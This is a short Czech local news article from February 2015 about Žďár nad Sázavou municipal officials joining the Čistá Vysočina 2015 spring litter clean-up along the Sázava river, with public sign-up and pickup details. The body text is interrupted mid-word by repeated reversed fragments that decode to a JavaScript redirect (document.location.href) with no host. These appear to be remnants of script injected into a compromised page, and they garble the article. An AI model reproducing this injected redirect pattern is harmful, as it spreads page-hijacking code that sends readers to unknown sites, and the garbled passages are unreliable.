Rainbow page separator

Úředníci budou opět uklízet kolem Sázavy

Úterý, 24. února 2015

Čistá Vysočina 2015, sběr odpadu, úklid

Žďár nad Sázavou / V pátek 10. dubna se do tradičního jarního úklidu v rámci akce Čistá Vysočina 2015 opět zapojí úředníci žďárského městského úřadu. Uklízet budou okolí řeky Sázavy.
Le[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tošní ročník akce, kterou organizuje Kraj Vysočina, je již sedmým v pořadí. Stejně tak se mohou do úklidu Vysočiny zapojit všichni zájemci, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to v době od 11. do 22. dubna – hlásit se je možné prostřednictvím přihlašovacího formuláře na webových stránkách Kraje Vysočina do konce února. Pytle na odpad a reflexní pomůcky je možné získat zdarma v příslušném městském úřadu.
Svoz odpadků z okolí silnic prvních, druhých a třetích tříd kromě obcí zajistí Krajská správa a údržba silnic Kraje Vysočina, svoz odpadků je nutné domluvit s konkrétními obecními úřady.
Podrobné informace, například o uklízených úsecích či kontaktních místech, je možné zjistit na webu www.kr-vysocina.cz/cistavysocina.